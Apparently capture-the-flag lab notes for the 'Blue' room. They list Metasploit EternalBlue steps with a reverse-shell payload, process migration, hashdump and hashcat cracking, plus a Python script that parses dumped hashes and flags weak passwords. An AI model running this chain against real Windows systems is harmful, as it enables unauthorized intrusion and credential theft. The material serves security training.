Blue (internal blue)

Exploit a Windows machine by leveraging common misconfiguration issues.

// steps (msfconsole)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target ip>
set payload windows/x64/shell/reverse_tcp
set LHOST <tun0 ip>
run
background (ctrl-z)
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

List all of the processes with 'ps'. Just because we are SYSTEM doesn't mean our process is (check with 'getuid'). Find a process towards the bottom of this list that is running as NT AUTHORITY\SYSTEM and write down its process id.
Migrate to this process using the 'migrate PROCESS_ID' command, where PROCESS_ID is the one you just wrote down.

hashdump

hashcat -m 1000 -a 0 hashrun1.txt -o cracked.txt /home/kali/htb/rockyou.txt
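The hashdump step prints pwdump-format lines (user:RID:LM:NT:::), but hashcat -m 1000 only parses a bare 32-hex NT hash per line, so hashrun1.txt has to be prepared from that output. The script below is an added example, not part of the original notes or of Metasploit, that parses hashdump output, flags the findings a defender auditing a SAM would report (blank passwords, stored LM hashes, accounts sharing a password) and writes the NT-hash-only file. The sample hashdump text and its hash values are constructed; the two Windows constants (the empty-password NT hash and the "no LM hash" marker) are the real, well-known values.

```python
import re
from collections import defaultdict

# Well-known Windows constants (not constructed): the NT hash of an empty
# password, and the value written in the LM field when no LM hash is stored.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
NO_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# pwdump format as printed by meterpreter's hashdump: user:RID:LM:NT:::
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample hashdump output; the hash values are made up, not from any real host.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1002:fedcba9876543210fedcba9876543210:89abcdef0123456789abcdef01234567:::
[*] this line is meterpreter chatter and is ignored by the parser
"""


def parse_hashdump(text):
    """Parse pwdump-style lines into dicts; non-matching lines (status output) are skipped."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["rid"] = int(d["rid"])
        d["lm"] = d["lm"].lower()
        d["nt"] = d["nt"].lower()
        entries.append(d)
    return entries


def audit(entries):
    """Return (account, issue) findings: blank passwords, stored LM hashes, shared passwords."""
    findings = []
    users_by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] == EMPTY_NT_HASH:
            findings.append((e["user"], "blank password"))
        if e["lm"] != NO_LM_HASH:
            findings.append((e["user"], "LM hash stored (legacy, weak hash)"))
        users_by_nt[e["nt"]].append(e["user"])
    # Identical NT hashes mean identical passwords: a reuse finding across accounts.
    for users in users_by_nt.values():
        if len(users) > 1:
            findings.append((",".join(users), "same password (identical NT hash)"))
    return findings


def nt_hashes_for_hashcat(entries):
    """Unique NT hashes, one per line: the only format hashcat -m 1000 parses."""
    unique = []
    for e in entries:
        if e["nt"] not in unique:
            unique.append(e["nt"])
    return "\n".join(unique) + "\n"


if __name__ == "__main__":
    ents = parse_hashdump(SAMPLE_HASHDUMP)
    for account, issue in audit(ents):
        print(f"{account}: {issue}")
    # hashrun1.txt is the file name used by the hashcat command above.
    with open("hashrun1.txt", "w") as fh:
        fh.write(nt_hashes_for_hashcat(ents))
```

Running it prints the findings and writes hashrun1.txt with one NT hash per line, deduplicated so a password shared by several accounts is cracked once; hashcat's -o output file then maps hashes back to the accounts via the parsed entries.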
